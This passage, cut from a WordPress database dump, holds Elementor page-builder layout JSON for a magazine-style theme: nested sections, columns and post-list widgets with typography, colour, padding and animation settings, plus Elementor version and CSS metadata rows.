top\":\"30\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gifizg0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"65.004\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"in485g7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"sqh26zs\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"48.082\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"ni7iq5b\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"8\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#385c7b\",\"post_list1_category_background_hov_color\":\"#385c7b\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true},{\"id\":\"feegelf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"51.918\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true},{\"id\":\"wnhjaaz\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"category\":[\"10\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#00c5b5\",\"post_list1_category_background_hov_color\":\"#00c5b5\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#00c5b5\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-5\",\"bottom\":\"0\",\"left\":\"-5\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"3j25kle\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"q18cnb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"o6ou2yp\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"offset\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"700\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"use_meta_post_list_1\":\"\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"-15\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true},{\"id\":\"wg2jk1s\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"e37o4qh\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"328\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"xn60yo4\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"9z1mjq9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"7lys9fz\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4b0mlug\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"34.995\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"nk9gr2t\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"lpp590q\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(1067,399,'_elementor_version','0.4'),(1068,399,'_elementor_css','a:3:{s:4:\"time\";i:1508766858;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1076,402,'_elementor_edit_mode','builder'),(1077,402,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"